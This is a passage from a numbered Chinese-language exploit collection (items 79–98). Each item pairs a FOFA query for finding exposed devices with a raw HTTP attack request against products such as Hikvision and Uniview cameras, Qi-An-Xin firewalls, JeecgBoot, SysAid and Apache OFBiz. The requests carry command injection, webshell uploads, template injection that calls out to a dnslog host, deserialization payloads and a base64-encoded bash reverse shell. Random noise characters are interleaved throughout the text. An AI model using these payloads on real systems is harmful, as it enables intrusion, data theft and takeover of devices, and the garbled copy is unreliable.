------YsOxWxSvj1KyZow1PTsh98fdu6l7 f9 W2 }2 ^0 G# f$ k# T" U# P
Content-Disposition: form-data; name="target"
: X6 J# S1 S4 Q$ h7 T0 O: f
. t" N; M0 r2 a0 T/Applications/SkillDevelopAndEHS/1 O( T" Y9 g& a' K6 b
------YsOxWxSvj1KyZow1PTsh98fdu6l--
- C% X% N  D) f/ b0 P: e1 S2 f- M$ Y) d7 u* F& O# V; J5 L; D) v

( i) u( V% M$ u1 UGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
8 o  R7 N; N- a0 T" Q5 o: F" l* aHost: x.x.x.x
0 f% c, D2 K8 i* D
+ q/ Z# m! R* F" N
7 S* X' j" P* @% q' D79. BYTEVALUE 百为流控路由器远程命令执行
: c& ]8 q0 x$ z' G' x9 ^FOFA:BYTEVALUE 智能流控路由器
; ?, p( `# p* I" K* OGET /goform/webRead/open/?path=|id HTTP/1.1- ?; y, k2 F& r
Host:IP( k2 Q! U& r8 W' Y6 C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
/ S9 {/ [' j6 m2 u  nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
) {, z; {, p0 l% l. c( pAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  B  J# m2 S! K# i" c0 e% T4 @0 ?
Accept-Encoding: gzip, deflate
; y! z0 N4 v* C" IConnection: close) f. Y1 y. ]8 |, c1 O  E
Upgrade-Insecure-Requests: 1
  w% e* [) z. w( n3 S7 j8 l/ C  e, z9 R9 Z% L* v* Z
1 k4 M9 @, N' p! v. `
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传( M( N. A- b2 `7 s% R
FOFA:app="速达软件-公司产品"
1 C3 ]& z# n2 M9 z4 Y% sPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
/ H: [$ z: q4 d: O6 dHost: x.x.x.x& j" A7 p4 z" [6 y+ [5 ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
; M0 Z# e$ a' H) w* `- R0 U4 {Content-Length: 27
7 C1 O6 r9 B# G) r1 }2 H$ TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.80 h# G5 [8 p1 X9 y. g0 n
Accept-Encoding: gzip, deflate# p  G9 C3 ?. z1 d4 J% x
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' s5 D5 Y5 X+ I- ?6 t9 DConnection: close
  h8 i" L0 U2 _3 V0 [+ T8 gContent-Type: application/octet-stream
8 C( K* o2 H. o; r, L+ j. H8 wUpgrade-Insecure-Requests: 16 G; V. x. t% ~& P/ x, C
2 H) ^: D. L2 W+ C4 q
<% out.print("oessqeonylzaf");%>) K4 t+ E8 d  i- t8 z. @; A" O

5 D. r, f- ~9 X# x5 }8 X, _+ t  f3 j. {
GET /xykqmfxpoas.jsp HTTP/1.1
- f. k3 s8 I! I3 [0 ^, h2 kHost: x.x.x.x+ p3 U& e) @6 Z1 o9 o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" S+ B: _% S+ F8 Q. q  L  g
Connection: close
0 e! J  A( c  @) A& b- j6 o! A, v6 VAccept-Encoding: gzip
2 S( }+ _2 O. e3 n; W0 p* P8 i- S
( a: n+ [/ y: J3 m
* ]% B/ H* k" o( c81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
: @, e- c) S1 V' b* k# uFOFA:app="uniview-视频监控"
! r0 t  T) {! w5 g7 @3 ]6 cGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
; S2 j6 s+ k8 rHost: x.x.x.x
( R1 w6 p7 k: I% G9 mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 V  C1 _' Y$ Y4 e. b/ TConnection: close
" N+ l, T$ ^) I$ q% W7 [Accept-Encoding: gzip- n' t$ r, h5 c5 p9 t# Z

' E0 q7 u8 T" X% }6 h- p1 @
7 X0 p7 D7 \* @# k  v0 A$ z, i82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行2 T% |8 H, y; F8 t( `3 N
FOFA:app="思福迪-LOGBASE"/ Z0 g3 j2 b% T) F- _+ K
POST /bhost/test_qrcode_b HTTP/1.1
, B! }  h. E- L: l+ G8 `1 d" E" AHost: BaseURL
2 y' y7 c" Y) P" S5 u2 Z$ Q! I5 LUser-Agent: Go-http-client/1.1  `5 t: `$ |+ j$ b  j6 v
Content-Length: 23
. f5 _0 v4 [% I9 k6 hAccept-Encoding: gzip
: R! y( Z3 ~+ _# e  P4 q( L) JConnection: close  {  d9 A- n2 ?) `  Y
Content-Type: application/x-www-form-urlencoded
# Y! c; z& J$ e* n, o( ]  D& ~8 G1 w8 eReferer: BaseURL
! G' f) Q9 A, h  r) H/ \2 e4 I$ j* {% H9 G. h; _4 o
z1=1&z2="|id;"&z3=bhost
8 a  _, @# K# X8 v' r* b, y; @% |4 J
! e" j. \, I/ X5 H( W1 A; n
83. JeecgBoot testConnection 远程命令执行' N% f1 m- `+ o7 M8 [
FOFA:title=="JeecgBoot 企业级低代码平台"
& a" L$ A% x) u4 @
+ T) H. e5 L- ^# r0 _
! @3 i9 R1 r$ o7 E5 F2 uPOST /jmreport/testConnection HTTP/1.10 k! y0 H& I8 b' H* T6 L- l
Host: x.x.x.x
! W; y8 x2 m  t* L4 h: P2 o- RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' z+ w1 K: ]5 ~4 W; @$ D0 w. R4 v
Connection: close
4 O* p- T- H" N1 [; f  S; m4 iContent-Length: 88811 N7 W6 G! l. b
Accept-Encoding: gzip' u) b& ~" w$ j% {* _' D
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
0 f7 W0 V+ d6 c3 ^$ I8 K# UContent-Type: application/json
$ ]; V. T; w' E) J2 ~- M6 A- R
" _0 y2 O# Y1 |6 b% s6 ?, w& E: sPAYLOAD
7 a: f- G; {" |; n& Z
) p- s7 b$ S* @! D84. Jeecg-Boot JimuReport queryFieldBySql 模板注入1 W' a! a# }+ V% k5 [6 a- [
FOFA:title=="JeecgBoot 企业级低代码平台"
$ N+ \# m/ c% i5 c. a, W$ D, I, K" h) `5 \0 Q, W" s. \2 F
9 \! Y7 t: M" i

' d* L& J  O- E5 L- lPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
" m- u: z. H; ]7 sHost: 192.168.40.130:80809 |; b3 ^! P' k! E4 {1 [
User-Agent: curl/7.88.1
' [* F" R8 y7 b' ?& T8 ^Content-Length: 156
' g+ ?$ H* m: g( Z$ ^5 k1 n( t9 OAccept: */*: v0 ^7 l- S' h& f* u2 @
Connection: close
. d% r7 Q* ]) ^) WContent-Type: application/json
* d1 H- S* N. ^Accept-Encoding: gzip' e$ g' `3 A3 C; o1 f
, z) W, ]& X5 }
{4 g1 a* F$ C# S3 Q- j
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",3 F4 h. t4 p. N, V
  "type": "0"& L, \. f2 c- X1 v7 T
}
( Y/ f, i& C9 T% m
+ p2 S& B( U$ ~; ]6 \$ m1 Q+ h' z. \7 A% v% o1 U* W$ E, h" c
85. SysAid On-premise< 23.3.36远程代码执行( F, g9 x5 ]# y! Y
CVE-2023-47246* J; N! @% G* Q& U
FOFA:body="sysaid-logo-dark-green.png"
9 C8 r) g' E% B! h7 a. NEXP数据包如下,注入哥斯拉马- r6 z) O- T# P5 t' s, z; d
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1" q& f+ ~% k5 z- `
Host: x.x.x.x4 u3 B, Z9 H3 {5 k% e+ M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 I$ [7 s7 T5 |- G
Content-Type: application/octet-stream1 V6 b. z) R7 v" M- w0 S3 I
Accept-Encoding: gzip
: ?7 Z. ~1 d6 p4 j3 I1 p# O9 u+ L! Y7 [7 M/ ~- n
PAYLOAD
. v+ A: s7 h, O0 r1 |2 l: }$ x! b+ ?# n. H, O% I7 X! t2 A
回显URL:http://x.x.x.x/userfiles/index.jsp
& M9 s8 t) L6 f7 C& t, Y# B1 z) A& k1 S$ y  T! }( ]
86. 日本tosei自助洗衣机RCE
2 k: o" @* R/ s9 n/ `$ S9 X, b+ `FOFA:body="tosei_login_check.php"
5 O% f( ?. E  }* b% j, t, hPOST /cgi-bin/network_test.php HTTP/1.15 N, L5 N8 ]. H7 I" }, A8 {9 r) A
Host: x.x.x.x
# w0 N% x! C9 k: fUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.368 o9 e3 q  b  j' b  r) U" Z
Connection: close
1 ]; j8 D' v, n! |9 v. aContent-Length: 449 o7 H( Q& ~9 d0 L
Accept: */*) H5 ~& x+ @4 m7 A* d( R
Accept-Encoding: gzip
2 O2 M5 R0 u* i% JAccept-Language: en
9 K7 a$ k4 h) q5 {- YContent-Type: application/x-www-form-urlencoded0 I/ ?$ L" N% U0 R' ?) K" e! N

7 R* s4 L7 G; q' Q  W& D  G: Khost=%0acat${IFS}/etc/passwd%0a&command=ping
" x2 v, ~6 @: _, m  a( {% t
# \5 [7 d; U$ D: C: |- L
9 |" \/ W- o1 p2 g87. 安恒明御安全网关aaa_local_web_preview文件上传; Z, S+ s$ U* T+ q/ q
FOFA:title="明御安全网关"" A! o7 I+ E- K& j9 i9 n1 V
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
  p6 e- k8 d+ G+ U1 F# a3 K, ~% AHost: X.X.X.X; j9 g1 n) ]- z! J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* r( |, S9 A- W0 c/ }' K% Q: N5 v# DConnection: close- h& \, a1 r+ H8 _4 J
Content-Length: 198+ w1 y6 T% B$ g' _
Accept-Encoding: gzip
$ ]/ z- [3 \7 Y, CContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
# D) c5 m6 F+ G* ]. `1 [/ f1 \/ s* r' A" w; [9 j" c
--qqobiandqgawlxodfiisporjwravxtvd% r$ E' s! Q( Y* G
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
6 F$ H# q/ {& z, Z3 |: {$ ZContent-Type: text/plain
0 q5 v5 B! M; z+ E
  z( _( v: B& g2ZqGNnsjzzU2GBBPyd8AIA7QlDq
' q* q# `: w: P' }--qqobiandqgawlxodfiisporjwravxtvd--1 Q! _2 e- Z3 E
; x7 a" j+ b$ a( }

' h8 f4 l/ ]' J; Q! E/jfhatuwe.php
2 k% j& l: G/ A
; k" k! [3 J9 R; U! ], Y2 I+ c: N88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行5 E' ^3 A, _- w  [9 |
FOFA:title="明御安全网关"/ y4 x/ D/ G( ^# S
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
4 a7 {  j3 R+ J4 ZHost: x.x.x.xx.x.x.x: v& N. y) t+ `; u0 d8 @, C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% f' L2 P7 P* a+ b% `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 O; d9 E( H* J. xAccept-Encoding: gzip, deflate8 E! W% W5 i- V) S/ ~- U- a3 b
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& E2 w  R1 R7 h3 O' M5 g
Connection: close2 K  X# P9 ?8 ?/ a) h$ f# w! L
. E5 ~- U# d. W6 e* D" `

# d0 s9 ?2 U$ R& }9 g/ U0 T/astdfkhl.php
2 N1 c' M1 w' t" m; B" l0 y9 q8 q3 N+ K) O; N/ Z  |
89. 致远互联FE协作办公平台editflow_manager存在sql注入
5 ?# G& g8 v( O- eFOFA:title="FE协作办公平台" || body="li_plugins_download"
: l& ^3 a+ ?9 O- y: b" ], s1 uPOST /sysform/003/editflow_manager.js%70 HTTP/1.1  c8 P  ~; N6 ^8 [
Host: x.x.x.x, m5 I! D& t3 M1 D, A+ }# ^$ a  \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% B( m9 I* i* H6 nConnection: close
- W0 s4 q' G5 hContent-Length: 41
2 f/ M" `/ Q# r" ^! o1 R- DContent-Type: application/x-www-form-urlencoded; K7 t! b# }: V
Accept-Encoding: gzip
& n; ^( c& t0 @) O/ n2 B: `6 p0 X0 X, ]2 o; F
option=2&GUID=-1'+union+select+111*222--+7 j& T/ q: k1 V: b. H
* }2 |$ k3 y1 @, T5 Y
5 w1 c2 R9 J/ O9 Z6 h
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行- i% r: c4 V5 Y& G* t% ]& H
FOFA:icon_hash="-1830859634"; ]  ^# b0 _# O1 e
POST /php/ping.php HTTP/1.18 A: {8 W( o7 e! p2 ]8 i
Host: x.x.x.x
; z: l: [! \: P' t; jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0; p" w! G: l) I2 v% w8 T
Content-Length: 51
" _5 Q3 [* t1 P, e# r' iAccept: application/json, text/javascript, */*; q=0.01$ b3 H1 o+ D- F) j0 E, {
Accept-Encoding: gzip, deflate8 P, i$ j/ i" J/ f% x. P
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 h& V2 R, I- ]. H& _, J- }6 V+ I
Connection: close3 {3 e) X+ h, D5 Y6 f- F0 w6 o
Content-Type: application/x-www-form-urlencoded2 W* @9 P  I! R2 V2 B6 i1 U
X-Requested-With: XMLHttpRequest
/ }( R* w* ^9 r9 c" a
0 V4 t: T( X: j+ l$ F' U6 u& ljsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig. B0 e0 B6 N' {2 o1 T  }9 P

% S- W0 _1 _$ {+ `
& l, h! ~/ q5 ]) ~91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
. j% H2 q3 o( ?+ AFOFA:title="综合安防管理平台"
+ s: M+ {/ Z3 u7 @" j) CGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1" E  ]6 ~2 K8 @) ^5 _4 F0 e
Host: your-ip
/ K; J  U( S/ ^; N2 yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36  f$ f% k! L! j! @
Accept-Encoding: gzip, deflate; y2 E, C5 `% N$ t
Accept: */*. H* ]% K+ [  `' h( E
Connection: keep-alive1 C4 I( b3 n4 r+ l
/ E% ?# J" ~8 G' p( Z# U1 E0 q: D
! r; ?7 K+ m: D7 u8 t
; q: N% {( O; b) x0 e* I0 R
92. 海康威视运行管理中心session命令执行! Z$ J! i) h( z+ c( M% H" |5 ~
Fastjson命令执行
* p4 s  i+ i) ]' G! C. G, thunter:web.icon=="e05b47d5ce11d2f4182a964255870b76": k+ a6 a2 |9 z
POST /center/api/session HTTP/1.1) o! G: c% t8 o
Host:) ?+ e7 M' U) A% W
Accept: application/json, text/plain, */*
0 f+ E) ~' d! u! c( mAccept-Encoding: gzip, deflate
: N6 c" Q; o& K$ YX-Requested-With: XMLHttpRequest
$ ~) w- W4 m8 C2 v5 `Content-Type: application/json;charset=UTF-8
" n. C+ q, n6 z- m. U% E1 C  XX-Language-Type: zh_CN1 E( E9 S  g% q* S
Testcmd: echo test! ~' z) a! q- R/ f- U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36: D2 j& _! a7 f: Z' [" `# S
Accept-Language: zh-CN,zh;q=0.9
' Z* C! c+ E3 G8 l2 x& W/ @$ JContent-Length: 5778
; `) l, k/ q4 U% I/ U3 {  S+ @+ s' R
PAYLOAD
2 E6 V' P8 O, z) @6 z# s# J7 m5 c& \' G: D
1 _0 e4 m/ Q5 L6 \/ \& u
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
  r) X3 z: e5 l  D- e( l+ [8 m4 MFOFA:fid="1Lh1LHi6yfkhiO83I59AYg==". h5 ]1 z6 R& o& `1 f) L+ g
POST /?g=app_av_import_save HTTP/1.11 ~, Z4 f+ o- l( |
Host: x.x.x.x
4 ~0 Y5 C/ H5 E9 C5 }Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx* a; ^, a* }: m
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
* ?$ e* |6 j' [1 \' I. ]. v8 j: I3 V$ `' O- i4 C. _
------WebKitFormBoundarykcbkgdfx  @% l* T- I0 ]" E( s$ U
Content-Disposition: form-data; name="MAX_FILE_SIZE"
: x/ U9 M8 ]* \0 p: ?8 O+ I4 y* s3 s% {2 i% [
10000000
3 k1 S6 ^$ c& N2 Z4 v. w------WebKitFormBoundarykcbkgdfx
- \$ c& q6 A. O0 s/ k$ ]Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
' y, k1 ?2 e" R! vContent-Type: text/plain; E! E, U& }6 R4 U; \- u
" M0 n, V+ m) k' ?+ }( R& _9 k* D4 Z
wagletqrkwrddkthtulxsqrphulnknxa
1 o9 b5 P; _/ }/ Q; U% B; y( i- q------WebKitFormBoundarykcbkgdfx& {, j* E) c8 u( A
Content-Disposition: form-data; name="submit_post"5 s" Q1 `1 A5 ~3 z
8 `' w  |) P/ z1 [( p6 }8 O
obj_app_upfile
& w" u4 s% e4 u5 c9 J------WebKitFormBoundarykcbkgdfx
+ L  `/ n/ ~) k/ J% ^Content-Disposition: form-data; name="__hash__"
2 g1 w6 f7 c8 ]3 p  w( B8 D2 K, ]
0b9d6b1ab7479ab69d9f71b05e0e9445
- a9 J' K* N5 ?/ w% J: d------WebKitFormBoundarykcbkgdfx--
* O  S) _* P4 {6 T" |/ A, B
$ n  O( D: ^5 I; H; L! J; {
" h1 Z/ l, B' d; b% gGET /attachements/xlskxknxa.txt HTTP/1.1
6 E% F9 G1 B5 P3 PHost: xx.xx.xx.xx6 D8 O% Y/ N- F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
/ O3 c% i9 w5 y, C9 L
/ S6 |! J9 f! B2 ]3 x. `8 g1 m* {
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传0 G2 x  `7 S! K& G
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="( H. g- J5 Z4 Y% `6 d3 q
POST /?g=obj_area_import_save HTTP/1.1
0 @" Z) l# z/ t- D* FHost: x.x.x.x% N3 H8 U7 ^3 k- I# q8 @) R
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt# x6 \- {7 |7 w9 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
. x5 c4 r, r, q7 l5 X+ s6 t; e: A. M+ W# [
------WebKitFormBoundarybqvzqvmt
% `) U3 O* N9 {. o( nContent-Disposition: form-data; name="MAX_FILE_SIZE"1 z$ s; n$ ]  W$ S( i

3 e% C, ?) w; r. y4 }10000000
9 v- O: Z$ P- I/ Y. M------WebKitFormBoundarybqvzqvmt
: J7 z- C$ b3 ]9 t8 dContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
7 V3 {& t7 O1 K9 l7 nContent-Type: text/plain
2 v. V" z5 M. X2 {  M
/ z) k8 Z. H- h& w  Upxplitttsrjnyoafavcajwkvhxindhmu
8 K" E1 @3 ]: e% r7 t------WebKitFormBoundarybqvzqvmt
  s* i) z# i4 i+ Z) m) u# l. {" HContent-Disposition: form-data; name="submit_post"
# {1 ~) @) L5 u" r% K' ^! `5 ]" g$ k5 V+ M' j
obj_app_upfile
6 W1 ^3 E5 s& k* g2 P------WebKitFormBoundarybqvzqvmt0 ^% }2 }4 k% r8 t: d! o
Content-Disposition: form-data; name="__hash__"
# p( |, K$ n+ P! p% N
0 y  @* F+ [$ M" H0b9d6b1ab7479ab69d9f71b05e0e9445
8 w9 D: X7 D9 \" t------WebKitFormBoundarybqvzqvmt--& t, n2 q, B3 T5 M6 I, L/ v% H

, Q- V" ]; V9 ?8 i
' T8 Y+ r" V. Q' A& Z( J
" e( W# g$ P% ?$ SGET /attachements/xlskxknxa.txt HTTP/1.1
2 G/ G) }2 b# Z& ^6 U& xHost: xx.xx.xx.xx
" U6 C3 h2 y# t% tUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36  e4 y/ a2 W& X) ]: ~$ K, m& T
+ l& j: c! d2 g" m: R

# E: |: H( w, E1 m9 }- E7 U9 ]
8 i& B; n; T. }/ K95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
  z+ ?; P. f5 `5 }8 J4 ^CVE-2023-49070
6 g; @# _1 Z/ V! x. H: GFOFA:app="Apache_OFBiz"4 j* k0 p  @2 D, W7 K% C
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
  J: A+ W; z5 g9 I- GHost: x.x.x.x
3 i2 i0 ?8 W! o1 {5 l' vUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36& P/ _/ Y' b0 n' y5 p
Connection: close+ z/ Z7 y( K3 L4 s0 g4 U
Content-Length: 889
5 ]( j: u3 l4 v9 |' m' AContent-Type: application/xml# }" B) B" K7 D0 P
Accept-Encoding: gzip
3 y+ v1 A0 T6 R/ e
2 C8 B3 O1 n. J* t<?xml version="1.0"?>
' b% ~) D! }, }* L& O<methodCall>( p1 l* p  c- H
   <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>, ~4 A$ a1 k* Z2 x' {: J% o
    <params>
" e3 f/ k' N% L# a9 ^$ N+ j9 @      <param>
2 w- ~, Z; u/ h- {8 g      <value>9 ?# r0 Q6 K. v5 s2 |
        <struct>/ x/ G+ A/ M) K9 R, V: u% y( t7 N
       <member>
4 q- F& z0 L* y          <name>test</name>2 k* K8 \+ g  q
          <value>
" I0 \5 u+ f6 g4 W- A9 i$ r      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>1 }" ~) I! `+ z! ^6 E% K8 ^2 n
          </value>
: B/ X6 K* Q, D0 j2 h        </member>$ }8 O4 P/ u3 y( Z
      </struct>
' c& \4 I! Q. R* p/ s      </value>
  Z& K7 m, L  v    </param>3 P. m$ _- N5 k/ B1 S7 m* D# v% h
    </params>& c4 f* Y2 Q$ n' ^1 }) B0 c2 C
</methodCall>) M, [7 s3 {" r/ f7 J% }3 D

+ e' d2 G' P' S/ v8 ?) t9 O) ~# g! @
9 ~; i/ \! n9 Y, a; g用ysoserial生成payload
, D5 U2 h! Y1 @1 C. Jjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
  q0 @- r% V" a& U$ G, ~; @9 i

0 e5 h4 E) n  Y9 o) J! g将生成的payload替换到上面的POC
& h" w6 @- j; {4 _POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.14 W+ E5 ?! }3 k  L# _9 ?
Host: 192.168.40.130:8443
; o4 e1 I/ x$ c9 s* uUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36% |! u1 c7 @" e. R8 k
Connection: close  m$ n- T' \0 `3 k
Content-Length: 889" S4 ^* `7 d3 m& A
Content-Type: application/xml
3 D" t1 t- B  [- u' ~$ A9 w9 w" EAccept-Encoding: gzip* \4 m5 [& x7 ?3 m9 w
8 e( I# T* m% L7 h! N# ]" ^
PAYLOAD! X9 c' e2 ]( Z/ H
0 o- A1 Z7 E& Q) }8 J; M6 i: _
96. Apache OFBiz  18.12.11 groovy 远程代码执行
' L6 A/ k; }( HFOFA:app="Apache_OFBiz", {" O2 F/ G6 i% m9 v8 Z9 G
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.14 r( u: a  i: \; t! f5 b
Host: localhost:8443
& n4 k( N/ T& [6 f& TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
/ f. o6 o4 ^* k2 xAccept: */*& S5 v! `5 |3 M
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& }7 [+ g- C  qContent-Type: application/x-www-form-urlencoded
% b2 Y- i; f& z% S! Y( S/ HContent-Length: 55% B, o- H, i7 x2 Z

( Z8 _' W$ |" {4 _6 }groovyProgram=throw+new+Exception('id'.execute().text);
3 ~% K& y( ~$ K+ e/ w
/ |* n5 D/ T6 k) c( G: V9 Z2 p. M6 d1 J6 q; \$ E- ^, a6 r7 j
反弹shell
/ j& Y6 N1 F9 ]( [- H7 D在kali上启动一个监听
- e2 Y: H2 m' \nc -lvp 7777
2 _: E) a2 d( M) M8 h$ B8 |4 I
- @; j7 j3 l* w: g  d: u8 jPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1: P: _: P% q: h' U$ [3 J3 Q
Host: 192.168.40.130:8443
- O: ?8 D# L2 W$ D6 F' QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
) B* G. o. }7 e' c/ o0 ~Accept: */*
. }1 O4 U3 A! HAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 X9 @8 F# s! K1 X8 x
Content-Type: application/x-www-form-urlencoded- }7 D' A; w% v8 U* D! m& B- P
Content-Length: 71
3 {+ Y7 I+ R) h& C8 }) `3 q+ h' i- j7 X- n5 v$ u* x7 N9 G) H
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();3 S/ X6 Z+ |5 r; n
" C7 D+ F9 W" i, s7 ]( N, ~
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
7 P! ~0 K/ n& k9 m$ qFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"& P" U/ \  ~. U+ ^+ Q) Y
GET /passport/login/ HTTP/1.1
8 P  M. y* a4 r% Z- T; CHost: 192.168.40.130:80857 u. r0 B+ Y' M- K2 Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* ^  m! Y: Q! g, ~' Q
Accept-Encoding: gzip
/ M" H6 q- N* X: _% EConnection: close
, ~6 N2 [5 p2 @- i3 a2 E; A4 @8 ECookie: rememberMe=PAYLOAD
$ w. M" {; C" k2 K/ ^X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk". W- k' s" I0 t! P$ c

, \& l: G8 Z( p0 m6 I# k3 t9 D, A$ D
98. SpiderFlow爬虫平台远程命令执行
; N( s* H( _+ WCVE-2024-0195$ P' i9 I0 S$ q/ i6 }4 w
FOFA:app="SpiderFlow"
) v7 V5 p6 P" [* n/ {" PPOST /function/save HTTP/1.1/ f3 y, a! [' X" w9 t5 z+ a
Host: 192.168.40.130:8088, e2 N6 Y- X+ T; h, l& ~! o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.02 W! ~* l1 P( ]5 I, V# R% a1 ]
Connection: close
- a  d  G8 I4 _3 x6 P) ?# T+ vContent-Length: 121
